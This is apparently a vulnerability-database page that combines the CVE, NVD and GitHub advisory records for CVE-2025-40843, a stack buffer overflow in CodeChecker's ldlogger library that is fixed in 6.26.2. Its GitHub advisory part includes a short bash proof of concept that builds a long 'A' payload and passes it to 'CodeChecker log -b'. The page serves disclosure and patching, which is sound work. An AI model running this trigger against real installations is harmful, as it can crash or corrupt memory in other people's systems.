cvelistv5 - cve-2025-40843

CVE-2025-40843 (GCVE-0-2025-40843)

Vulnerability from cvelistv5 – Published: 2025-10-28 18:49 – Updated: 2025-10-28 19:30 X_Open Source

Title

Buffer overflow in CodeChecker log command

Summary

CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger library, which is executed by the CodeChecker log command. This issue affects CodeChecker: through 6.26.1.

Severity ?

5.9 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-121 - Stack based buffer overflow

Assigner

ERIC

References

URL

Tags

https://github.com/Ericsson/codechecker/security/…

vendor-advisory

Impacted products

	Vendor	Product	Version
	Ericsson	CodeChecker	Affected: 0 , ≤ 6.26.1 (python)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-40843",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-28T19:30:15.826239Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-28T19:30:25.737Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "platforms": [
            "Linux"
          ],
          "product": "CodeChecker",
          "vendor": "Ericsson",
          "versions": [
            {
              "lessThanOrEqual": "6.26.1",
              "status": "affected",
              "version": "0",
              "versionType": "python"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eCodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \u003c/span\u003e\u003cbr\u003e\u003cp\u003e\n\n\u003c/p\u003e\u003cp\u003eCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal \u003ccode\u003eldlogger\u003c/code\u003e\u0026nbsp;library, which is executed by the \u003ccode\u003eCodeChecker log\u003c/code\u003e\u0026nbsp;command.\u003c/p\u003e\n\n\u003cp\u003e\u003c/p\u003e\u003cp\u003eThis issue affects CodeChecker: through 6.26.1.\u003c/p\u003e"
            }
          ],
          "value": "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \n\n\n\n\nCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger\u00a0library, which is executed by the CodeChecker log\u00a0command.\n\n\n\n\n\nThis issue affects CodeChecker: through 6.26.1."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-100",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-100 Overflow Buffers"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "LOW",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-121",
              "description": "CWE-121 Stack based buffer overflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-28T18:49:49.516Z",
        "orgId": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf",
        "shortName": "ERIC"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-5xf2-f6ch-6p8r"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "tags": [
        "x_open-source"
      ],
      "title": "Buffer overflow in CodeChecker log command",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf",
    "assignerShortName": "ERIC",
    "cveId": "CVE-2025-40843",
    "datePublished": "2025-10-28T18:49:49.516Z",
    "dateReserved": "2025-04-16T08:59:01.744Z",
    "dateUpdated": "2025-10-28T19:30:25.737Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-40843\",\"sourceIdentifier\":\"85b1779b-6ecd-4f52-bcc5-73eac4659dcf\",\"published\":\"2025-10-28T19:15:41.757\",\"lastModified\":\"2025-11-14T18:52:30.597\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \\n\\n\\n\\n\\nCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger\u00a0library, which is executed by the CodeChecker log\u00a0command.\\n\\n\\n\\n\\n\\nThis issue affects CodeChecker: through 6.26.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"85b1779b-6ecd-4f52-bcc5-73eac4659dcf\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":5.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.5,\"impactScore\":3.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"85b1779b-6ecd-4f52-bcc5-73eac4659dcf\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-121\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ericsson:codechecker:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.26.2\",\"matchCriteriaId\":\"86A8B23F-51A5-4124-9FC0-DF0DC43476A0\"}]}]}],\"references\":[{\"url\":\"https://github.com/Ericsson/codechecker/security/advisories/GHSA-5xf2-f6ch-6p8r\",\"source\":\"85b1779b-6ecd-4f52-bcc5-73eac4659dcf\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-40843\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-28T19:30:15.826239Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-28T19:30:21.796Z\"}}], \"cna\": {\"tags\": [\"x_open-source\"], \"title\": \"Buffer overflow in CodeChecker log command\", \"source\": {\"discovery\": \"INTERNAL\"}, \"impacts\": [{\"capecId\": \"CAPEC-100\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-100 Overflow Buffers\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.9, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Ericsson\", \"product\": \"CodeChecker\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"python\", \"lessThanOrEqual\": \"6.26.1\"}], \"platforms\": [\"Linux\"], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/Ericsson/codechecker/security/advisories/GHSA-5xf2-f6ch-6p8r\", \"tags\": [\"vendor-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \\n\\n\\n\\n\\nCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger\\u00a0library, which is executed by the CodeChecker log\\u00a0command.\\n\\n\\n\\n\\n\\nThis issue affects CodeChecker: through 6.26.1.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003eCodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \u003c/span\u003e\u003cbr\u003e\u003cp\u003e\\n\\n\u003c/p\u003e\u003cp\u003eCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal \u003ccode\u003eldlogger\u003c/code\u003e\u0026nbsp;library, which is executed by the \u003ccode\u003eCodeChecker log\u003c/code\u003e\u0026nbsp;command.\u003c/p\u003e\\n\\n\u003cp\u003e\u003c/p\u003e\u003cp\u003eThis issue affects CodeChecker: through 6.26.1.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-121\", \"description\": \"CWE-121 Stack based buffer overflow\"}]}], \"providerMetadata\": {\"orgId\": \"85b1779b-6ecd-4f52-bcc5-73eac4659dcf\", \"shortName\": \"ERIC\", \"dateUpdated\": \"2025-10-28T18:49:49.516Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-40843\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-28T19:30:25.737Z\", \"dateReserved\": \"2025-04-16T08:59:01.744Z\", \"assignerOrgId\": \"85b1779b-6ecd-4f52-bcc5-73eac4659dcf\", \"datePublished\": \"2025-10-28T18:49:49.516Z\", \"assignerShortName\": \"ERIC\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2025-40843

Vulnerability from fkie_nvd - Published: 2025-10-28 19:15 - Updated: 2025-11-14 18:52

Severity ?

5.9 (Medium) - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	85b1779b-6ecd-4f52-bcc5-73eac4659dcf	https://github.com/Ericsson/codechecker/security/advisories/GHSA-5xf2-f6ch-6p8r	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	ericsson	codechecker	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:ericsson:codechecker:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "86A8B23F-51A5-4124-9FC0-DF0DC43476A0",
              "versionEndExcluding": "6.26.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \n\n\n\n\nCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger\u00a0library, which is executed by the CodeChecker log\u00a0command.\n\n\n\n\n\nThis issue affects CodeChecker: through 6.26.1."
    }
  ],
  "id": "CVE-2025-40843",
  "lastModified": "2025-11-14T18:52:30.597",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "LOW",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.5,
        "impactScore": 3.4,
        "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-10-28T19:15:41.757",
  "references": [
    {
      "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-5xf2-f6ch-6p8r"
    }
  ],
  "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-121"
        }
      ],
      "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf",
      "type": "Secondary"
    }
  ]
}

GHSA-5XF2-F6CH-6P8R

Vulnerability from github – Published: 2025-09-22 18:04 – Updated: 2025-10-29 14:48

Summary

CodeChecker has a buffer overflow in the log command

Details

Summary

CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger library, which is executed by the CodeChecker log command.

Details

Unsafe usage of strcpy() function in the internal ldlogger library allows attackers to trigger a buffer overflow by supplying crafted inputs from the command line. Specifically, the destination buffer is stack-allocated with a fixed size of 4096 bytes, while strcpy() is called without any length checks, enabling an attacker to overrun the buffer.

PoC

Example script is included below to illustrate how this vulnerability can be exploited.

#!/bin/bash

export CC_LOGGER_DEF_DIRS=1; 
payload=''; for i in $(seq 1 4090); do payload+='A'; done

CodeChecker log -b "/very/long/path/to/$payload/gcc a.c" -o compilation.json

Impact

Any environment where the vulnerable CodeChecker log command is executed with untrusted user input is affected by this vulnerability.

Severity ?

5.9 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.26.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "codechecker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.26.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-40843"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-121"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-22T18:04:20Z",
    "nvd_published_at": "2025-10-28T19:15:41Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nCodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal `ldlogger` library, which is executed by the `CodeChecker log` command.\n\n### Details\nUnsafe usage of `strcpy()` function in the internal `ldlogger` library allows attackers to trigger a buffer overflow by supplying crafted inputs from the command line. Specifically, the destination buffer is stack-allocated with a fixed size of 4096 bytes, while `strcpy()` is called without any length checks, enabling an attacker to overrun the buffer.\n\n### PoC\nExample script is included below to illustrate how this vulnerability can be exploited.\n```bash\n#!/bin/bash\n\nexport CC_LOGGER_DEF_DIRS=1; \npayload=\u0027\u0027; for i in $(seq 1 4090); do payload+=\u0027A\u0027; done\n\nCodeChecker log -b \"/very/long/path/to/$payload/gcc a.c\" -o compilation.json\n```\n\n### Impact\nAny environment where the vulnerable `CodeChecker log` command is executed with untrusted user input is affected by this vulnerability.",
  "id": "GHSA-5xf2-f6ch-6p8r",
  "modified": "2025-10-29T14:48:34Z",
  "published": "2025-09-22T18:04:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-5xf2-f6ch-6p8r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40843"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Ericsson/codechecker/commit/4122eb1b43d00c880e4f0747d2ca0a674feb7a50"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Ericsson/codechecker"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CodeChecker has a buffer overflow in the log command"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-40843 (GCVE-0-2025-40843)

FKIE_CVE-2025-40843

GHSA-5XF2-F6CH-6P8R

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature